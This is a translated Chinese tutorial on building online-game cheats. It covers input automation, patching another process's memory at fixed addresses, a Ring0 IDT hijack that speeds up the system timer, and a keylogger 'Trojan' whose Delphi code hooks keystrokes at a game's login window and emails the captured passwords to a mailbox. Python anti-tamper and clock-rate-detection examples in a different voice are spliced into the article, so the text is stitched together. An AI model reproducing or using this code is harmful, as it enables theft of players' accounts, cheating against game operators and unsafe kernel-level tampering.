I spent some time studying it and have some personal experience to share with everyone. I have not made many kinds; in order of production difficulty they are:

1. Action plug-ins. A so-called action plug-in uses the API to send commands to the window, or uses the API to control the mouse and keyboard, so that the character in the game moves or attacks. The earliest "Stone" plug-ins were of this kind.

(This kind of plug-in is pure garbage: anyone who knows a few APIs knows what it does. Still, it is a good entry-level thing; it won't raise your combat power, but it will raise your morale.)

2. Local modification. This kind of plug-in has something of the traditional game modifier about it. To write one you only need a little understanding of memory addresses and mastery of the API; "Elf" plug-ins were written this way. The hard part is finding the address code; to find the addresses you usually need other people's tools, and some games have a double-code check, which makes the addresses even harder to find. (This kind is harder than the previous one, but it is usable, and it is hard. It quickly improves your understanding and application of memory addresses and is good for your programming skills.)

3. Trojans. The purpose of this kind of plug-in is to help its author steal the user's password ("bad" is the only word for it, but you have to know about it to be able to talk about it). Writing it is somewhat difficult; you need hook or keyboard-monitoring technology as a foundation. Its principle is to intercept the user's account or password and then send it to a specified mailbox. (I have written such a thing before but never used it. I know this kind of thing is very unethical, so don't use it!)

4. Acceleration. This kind of plug-in speeds up the game... (Sorry everyone, I have not actually made one, so I cannot say much.)

The first three can be implemented well in languages such as VB and Delphi; VC, with its better support for the lower layers, is the better tool for the last.

Action plug-ins

First let's talk about action plug-ins, the easiest kind, which I wrote first.

I remember back in the "Stone" days I saw someone running a piece of software (a plug-in) that made the character walk around by itself (I didn't even know what a plug-in was then), so I got hold of the software. After using it I heard from someone that it was not hard to implement: it simply made the character walk by controlling the mouse. On an impulse I ran to MSDN to look up some information, and found that this kind of function only needs a few simple API functions:

1. First we need to know the position of the mouse (so that we can restore it later). To get the mouse position we use the API function GetCursorPos, used as follows:

    BOOL GetCursorPos(LPPOINT lpPoint); // address of structure for cursor position

2. We move the mouse to the place the character should walk to; for this we use SetCursorPos, used as follows:

    BOOL SetCursorPos(int X,  // horizontal position
                      int Y); // vertical position

3. To simulate a mouse button press and release we use the mouse_event function, used as follows:

    VOID mouse_event(DWORD dwFlags,      // flags specifying various motion/click variants
                     DWORD dx,           // horizontal mouse position or position change
                     DWORD dy,           // vertical mouse position or position change
                     DWORD dwData,       // amount of wheel movement
                     DWORD dwExtraInfo); // 32 bits of application-defined information

In dwFlags many events are available, such as MOUSEEVENTF_MOVE for movement, MOUSEEVENTF_LEFTDOWN for left button down and MOUSEEVENTF_LEFTUP for left button up; for the details check MSDN.

Ok, with the knowledge above we can see how the character is made to walk:

    GetCursorPos(Point);
    SetCursorPos(RanPoint(80, WindowX), RanPoint(80, WindowY)); // RanPoint is a home-made random coordinate function
    mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0);
    mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0);
    SetCursorPos(Point.X, Point.Y);

Look at the code above: isn't making the character walk simple? (I said it, this is the garbage kind of practice, believe me.) Next let's look at how automatic attacking is done (the game must have an attack shortcut key). The principle is the same, only the API differs. This time we use the keybd_event function, used as follows:

    VOID keybd_event(BYTE bVk,           // virtual-key code
                     BYTE bScan,         // hardware scan code
                     DWORD dwFlags,      // flags specifying various function options
                     DWORD dwExtraInfo); // additional data associated with keystroke

We must know that the scan code cannot be used directly; the function MapVirtualKey converts a key value to a scan code. Its usage is as follows:

    UINT MapVirtualKey(UINT uCode,     // virtual-key code or scan code
                       UINT uMapType); // translation to perform

Ok, say the shortcut key is Ctrl+A; let's see how the actual code is written:

    keybd_event(VK_CONTROL, MapVirtualKey(VK_CONTROL, 0), 0, 0);
    keybd_event(65, MapVirtualKey(65, 0), 0, 0);
    keybd_event(65, MapVirtualKey(65, 0), KEYEVENTF_KEYUP, 0);
    keybd_event(VK_CONTROL, MapVirtualKey(VK_CONTROL, 0), KEYEVENTF_KEYUP, 0);

First the Ctrl key is pressed, then the A key is pressed, then the A key is released and finally the Ctrl key is released; that is one cycle of simulating the shortcut. (Having read this far you should have some understanding of simple plug-ins. Want to try? Imitate this and you can make something better; that depends on your comprehension. But don't be happy too early, there are more complex things waiting for you.)

Local-modification plug-ins

Now let's look at the whole production process of a more advanced kind of plug-in, the local-modification plug-in, in detail.

The most typical application of local-modification plug-ins that I know of is the "Elf" game, because in recent years (while "Elf" was still in testing) many colleagues in my company played "Elf", so I looked at how the game processes its data. I found that the information it sends to the server exists in memory first (my first feeling was that modifying this game was no different from modifying a stand-alone game; in other words, the memory address could be modified before the game submitted the information to the server). At that time I found the address and, sure enough, following my idea I modified the address, let the game submit automatically, and it really succeeded. Later "Elf" changed to double-address verification, memory verification and so on; I won't go on about that here.

Ok, let's see how this kind of plug-in is made. Before making it we need a concrete understanding of Windows memory. The memory we refer to is the system's memory offset, that is, relative memory, and that is what we modify. We then need to understand several Windows APIs. OK, let's see the production of this plug-in and the API usage through an example (to protect the normal operation of online games, I will not explain how the memory addresses are found):

1. First we use FindWindow to get the handle of the game window, because we need the ID of the process once the game is running. FindWindow is used as follows:

    HWND FindWindow(LPCTSTR lpClassName,   // pointer to class name
                    LPCTSTR lpWindowName); // pointer to window name

2. We obtain the process ID of the game process from its window with GetWindowThreadProcessId, used as follows:

    DWORD GetWindowThreadProcessId(HWND hWnd,              // handle of window
                                   LPDWORD lpdwProcessId); // address of variable for process identifier

3. After we have the game's process ID, the next thing is to open the process with the highest privilege. The function used is OpenProcess, used as follows:

    HANDLE OpenProcess(DWORD dwDesiredAccess, // access flag
                       BOOL bInheritHandle,   // handle inheritance flag
                       DWORD dwProcessId);    // process identifier

dwDesiredAccess is where you set the access mode; it can take many values. We just use PROCESS_ALL_ACCESS to open the process; the other modes can be looked up in MSDN.

4. After opening the process we can operate on it with the functions. Here we use WriteProcessMemory to write data to a memory address (other operations, such as ReadProcessMemory, I won't introduce here). WriteProcessMemory is used as follows:

    BOOL WriteProcessMemory(HANDLE hProcess,                // handle to process whose memory is written to
                            LPVOID lpBaseAddress,           // address to start writing to
                            LPVOID lpBuffer,                // pointer to buffer holding the data to write
                            DWORD nSize,                    // number of bytes to write
                            LPDWORD lpNumberOfBytesWritten); // actual number of bytes written

5. Finally, close the process handle with CloseHandle.
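The author mentions above that "Elf" later moved to double-address and memory verification to defeat exactly this kind of write. As an added example (my own code, not from the article), here is a small Python model of that defence from the game's side: each protected value is stored twice, once in clear and once masked with a per-instance key, and every read cross-checks the two copies, so a write that changes only the visible copy is detected on the next read and before anything is submitted to the server. The `ProtectedValue` and `GameState` classes, their field names and the `simulate_external_write` test helper are my own constructions for this demonstration; a real game would keep the shadow copy at an unrelated address.

```python
import os
from typing import Optional


class TamperDetected(Exception):
    """Raised when the clear value and its shadow copy disagree."""


class ProtectedValue:
    """A 32-bit value kept as a (clear, shadow) pair, where shadow = clear XOR key.

    A write that reaches only one of the two copies is caught on the next read.
    The key is random per instance unless one is supplied (for deterministic tests).
    """

    def __init__(self, value: int, key: Optional[int] = None):
        self._key = key if key is not None else int.from_bytes(os.urandom(4), "big")
        self.clear = 0
        self.shadow = 0
        self.set(value)

    def set(self, value: int) -> None:
        """The only legitimate write path: updates both copies together."""
        self.clear = value & 0xFFFFFFFF
        self.shadow = self.clear ^ self._key

    def get(self) -> int:
        """Cross-check the copies before returning the value."""
        expected = self.shadow ^ self._key
        if expected != self.clear:
            raise TamperDetected(
                f"clear copy is {self.clear:#x} but shadow decodes to {expected:#x}")
        return self.clear


class GameState:
    """Constructed stand-in for the game's character state."""

    def __init__(self, gold: int, hp: int):
        self.gold = ProtectedValue(gold)
        self.hp = ProtectedValue(hp)

    def earn_gold(self, amount: int) -> None:
        self.gold.set(self.gold.get() + amount)

    def snapshot_for_server(self) -> dict:
        """Verify every field before it is submitted, mirroring the check the author describes."""
        return {"gold": self.gold.get(), "hp": self.hp.get()}


def simulate_external_write(pv: ProtectedValue, value: int) -> None:
    """Test helper: models a write that hits only the visible address, bypassing set()."""
    pv.clear = value & 0xFFFFFFFF


def check_state(state: GameState) -> str:
    """Return 'ok' when all protected fields verify, 'tampered' otherwise."""
    try:
        state.snapshot_for_server()
        return "ok"
    except TamperDetected:
        return "tampered"


if __name__ == "__main__":
    state = GameState(gold=50, hp=200)
    state.earn_gold(25)
    print(check_state(state), state.snapshot_for_server())
    simulate_external_write(state.gold, 999999)
    print(check_state(state))
```

The XOR shadow is the simplest form of the idea; the same structure works with a checksum over the whole state block, and the important design point is that the verification runs at the moment the value is used (here, when the snapshot for the server is built), not only at load time.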

That is how this kind of plug-in is implemented for some games. Well, now that we have a rational understanding of the method, let's look at an actual example to build intuition. Below is plug-in code for game XX; compare it against the steps above:

    const
      ResourceOffset: DWORD = $004219F4;
      Resource: DWORD = 3113226621;
      ResourceOffset1: DWORD = $004219F8;
      Resource1: DWORD = 1940000000;
      ResourceOffset2: DWORD = $0043FA50;
      Resource2: DWORD = 1280185;
      ResourceOffset3: DWORD = $0043FA54;
      Resource3: DWORD = 3163064576;
      ResourceOffset4: DWORD = $0043FA58;
      Resource4: DWORD = 2298478592;
    var
      hw: HWND;
      pid: DWORD;
      h: THandle;
      tt: Cardinal;
    begin
      hw := FindWindow('XX', nil);
      if hw = 0 then Exit;
      GetWindowThreadProcessId(hw, @pid);
      h := OpenProcess(PROCESS_ALL_ACCESS, False, pid);
      if h = 0 then Exit;
      if FlatCheckBox1.Checked then
      begin
        WriteProcessMemory(h, Pointer(ResourceOffset), @Resource, SizeOf(Resource), tt);
        WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, SizeOf(Resource1), tt);
      end;
      if FlatCheckBox2.Checked then
      begin
        WriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, SizeOf(Resource2), tt);
        WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, SizeOf(Resource3), tt);
        WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, SizeOf(Resource4), tt);
      end;
      MessageBeep(0);
      CloseHandle(h);
      Close;
    end;

This game verifies the data to be submitted using the address, so producing a plug-in for this kind of game is not very hard; the hard part is finding these addresses.

Trojan plug-ins

Trojan plug-ins are perhaps the most Trojan-like, ugly things of all: they help the plug-in's author steal accounts and passwords. Because plug-ins like this exist on the network, I have to talk about them today (I personally hate this kind of plug-in; please look at it only as technology, thank you for your cooperation).
There are several ways to implement this kind of plug-in (such as hooks, keyboard monitoring and other techniques). Because hook technology is relatively demanding of the programmer and in practice needs an extra dynamic link library, in this article I will use keyboard-monitoring technology to implement this type of Trojan. Keyboard monitoring needs only one .exe file to monitor the keyboard in the background, so this technology is more suitable for this program.

Before writing the program we must understand its idea: 1. First we have to know the name of the login window we want to record. 2. Judge whether the login window has appeared. 3. If the login window appears, log the keyboard. 4. When the window is closed, send the recorded information to the programmer's mailbox.

I won't analyse the first point in detail, because you have to know what game you are playing and what the name of its login window is. From the second point on, let's start the implementation of this type of plug-in. So how do we judge whether the login window has appeared? In fact this is very simple; we can easily implement it with the FindWindow function:

    HWND FindWindow(LPCTSTR lpClassName,   // pointer to class name
                    LPCTSTR lpWindowName); // pointer to window name

In the actual program we have to find the 'XX' window, so we use FindWindow(nil, 'XX'); if the return value is greater than 0 the window has appeared, and then we can record the keyboard information. First we use SetWindowsHookEx to set up the journal-record monitor; this function is used as follows:

    HHOOK SetWindowsHookEx(int idHook,        // type of hook to install
                           HOOKPROC lpfn,     // address of hook procedure
                           HINSTANCE hMod,    // handle of application instance
                           DWORD dwThreadId); // identity of thread to install hook for

It has to be explained here that we have to write the HookProc ourselves, and for HINSTANCE we can use this program's hInstance. The concrete call is:

    hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, hInstance, 0);

The HookProc function is a little more complex:

    function HookProc(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
    begin
      if FindedTitle then // if the window has been found
      begin
        if PEVENTMSG(lParam)^.message = WM_KEYDOWN then // the message is a key press
          HookKey := HookKey + Form1.KeyHookResult(PEVENTMSG(lParam)^.paramL, PEVENTMSG(lParam)^.paramH);
          // KeyHookResult is a custom function whose main job is to convert the intercepted
          // message parameters into the key name; the author says the conversion function is
          // given later in the article, but it is not on this page
        if Length(HookKey) > 0 then // if we got a key name
        begin
          Write(HookKeyFile, HookKey); // write the key name to the text file
          HookKey := '';
        end;
      end;
    end;

The above is the whole process of recording the keyboard; simple. If you record, don't forget to release the hook with UnhookWindowsHookEx(hHook), where hHook is the handle returned by SetWindowsHookEx. Now that we have the keyboard record, all that is left is to send the recorded information back, and we are done.

Sending is not very difficult either: just read the record from the text file; I send it with the mail component that comes with Delphi. The code is as follows:

    AssignFile(ReadFile, 'hook.txt');   // open the text file hook.txt
    Reset(ReadFile);                     // set it to read mode
    while not Eof(ReadFile) do           // while the end of the file has not been reached
    begin
      Readln(ReadFile, s);               // read one line of the file
      Body := Body + s;
    end;
    CloseFile(ReadFile);                 // close the file
    NMSMTP1.EncodeType := uuMime;                         // set the encoding
    NMSMTP1.PostMessage.Attachments.Text := '';           // set the attachment
    NMSMTP1.PostMessage.FromAddress := 'xxx@xxx.com';     // set the source email address
    NMSMTP1.PostMessage.ToAddress.Text := 'xxx@xxx.com';  // set the target email address
    NMSMTP1.PostMessage.Body.Text := 'password' ...       // the rest of this statement is cut off in the source

Acceleration plug-ins

Originally I always thought that acceleration plug-ins were written for a particular game, and later I discovered that this idea was wrong. The so-called acceleration plug-in actually accelerates by modifying the clock frequency. People who did programming in the old DOS days immediately think this is very simple: isn't it just changing the 8253 register? That may have worked in the DOS era, but not under Windows.

Windows is a 32-bit operating system; you cannot change whatever you like (Microsoft's stuff is that domineering: it says no and you can't change it). But it is not impossible; we can implement it in two ways. The first is to write a hardware driver; the second is to do it in Ring0 (this method was first used by the author of CIH, Chen Yinghao; its principle is to modify the IDT -> create an interrupt gate -> enter Ring0 -> call the interrupt to modify the vector. For a high-level language user there is no other way to implement this!). The first method is troublesome, so here we use the second method.

Before implementing it, let's look at what has to be done: 1. First we must write a procedure with embedded assembly language that modifies the IDT, creates the interrupt gate, modifies the vector and so on. 2. Call this procedure to achieve the acceleration.

Now let's explain it while reading the code. First we build a procedure, which is the core part of this program (the procedure is named "String" on the page; that is a reserved type name in Delphi, so use another name in real code):

    procedure String(Value: Word); stdcall;
    const
      zdh = $03;                  // the interrupt number to use
    var
      IDT: array[0..5] of Byte;   // saves the IDT register
      OG: DWORD;                  // stores the old vector
    begin
      asm
        push EBX
        sidt IDT                      // read the interrupt descriptor table register
        mov EBX, DWORD PTR [IDT+2]    // IDT base address
        add EBX, 8*zdh                // locate our interrupt in the interrupt descriptor table
        cli                           // disable interrupts
        mov DX, WORD PTR [EBX+6]
        shl EDX, 16
        mov DX, WORD PTR [EBX]
        mov [OG], EDX                 // save the old vector
        mov EAX, OFFSET @@Ring0       // point to the Ring0-level code
        mov WORD PTR [EBX], AX        // low 16 bits, stored in the first two bytes
        shr EAX, 16
        mov WORD PTR [EBX+6], AX      // high 16 bits, stored in bytes 6 and 7
        int zdh                       // trigger the interrupt
        mov EBX, DWORD PTR [IDT+2]    // relocate the entry
        add EBX, 8*zdh
        mov EDX, [OG]
        mov WORD PTR [EBX], DX
        shr EDX, 16
        mov WORD PTR [EBX+6], DX      // restore the vector
        pop EBX
        jmp @@ExitAsm
      @@Ring0:                        // Ring0: this is the core part
        mov AL, $34                   // write the 8253 control register
        out $43, AL
        mov AX, Value                 // write the time value
        out $40, AL                   // low byte of the time value
        mov AL, AH
        out $40, AL                   // high byte of the time value
        iretd                         // return
      @@ExitAsm:
      end;
    end;

The core part is finished. Most readers will understand it by now; if not, heh, that's how it goes.
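The article does not say how a server can notice an accelerated client, but since the 8253 trick changes only the client's clock, the server's own clock is the natural reference. As an added example (my own code, not from the article), here is a Python rate check a game server could run: it records the client's reported timestamp against the server's arrival time for each message, fits the slope by least squares so network jitter does not produce false alarms, and flags a client whose clock advances faster than the tolerance. The sample timestamp streams are constructed; the window size and tolerance are my choices, not values from the page.

```python
from typing import List, Tuple

# (client_reported_ms, server_arrival_ms) as recorded for each incoming message
Sample = Tuple[int, int]


def estimate_clock_rate(samples: List[Sample]) -> float:
    """Least-squares slope of client time against server time.

    1.0 means both clocks advance at the same rate; 2.0 means the client
    clock runs twice as fast as the server's.
    """
    if len(samples) < 2:
        raise ValueError("need at least two samples")
    n = len(samples)
    mean_s = sum(s for _, s in samples) / n
    mean_c = sum(c for c, _ in samples) / n
    sxx = sum((s - mean_s) ** 2 for _, s in samples)
    if sxx == 0:
        raise ValueError("all samples arrived at the same server time")
    sxy = sum((s - mean_s) * (c - mean_c) for c, s in samples)
    return sxy / sxx


def classify_client(samples: List[Sample], tolerance: float = 0.05) -> str:
    """'fast' if the client clock outruns the server beyond the tolerance,
    'slow' if it lags beyond it, otherwise 'ok'."""
    rate = estimate_clock_rate(samples)
    if rate > 1.0 + tolerance:
        return "fast"
    if rate < 1.0 - tolerance:
        return "slow"
    return "ok"


class ClockRateMonitor:
    """Sliding window per client; call observe() on every message carrying a client timestamp."""

    def __init__(self, window: int = 10, min_samples: int = 5, tolerance: float = 0.05):
        self.window = window
        self.min_samples = min_samples
        self.tolerance = tolerance
        self.samples: List[Sample] = []

    def observe(self, client_ms: int, server_ms: int) -> str:
        self.samples.append((client_ms, server_ms))
        del self.samples[:-self.window]          # keep only the most recent window
        if len(self.samples) < self.min_samples:
            return "pending"
        return classify_client(self.samples, self.tolerance)


# Constructed sample streams: an honest client with a few ms of jitter, and a client
# whose clock advances about 2000 ms for every 1000 ms of server time.
NORMAL_SAMPLES: List[Sample] = [
    (1000, 5000), (2003, 6001), (2998, 7002), (4001, 8000), (5002, 9003), (6000, 10001)]
FAST_SAMPLES: List[Sample] = [
    (1000, 5000), (3002, 6001), (4999, 7000), (7001, 8002), (9000, 9001), (11003, 10000)]


if __name__ == "__main__":
    print("normal:", round(estimate_clock_rate(NORMAL_SAMPLES), 3), classify_client(NORMAL_SAMPLES))
    print("fast:  ", round(estimate_clock_rate(FAST_SAMPLES), 3), classify_client(FAST_SAMPLES))
```

A server that does not trust client timestamps at all can apply the same idea to message cadence instead: count game ticks or action messages per second of server time and compare against the rate the game logic allows.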

Please credit the original address when reposting: https://www.9cbs.com/read-38315.html
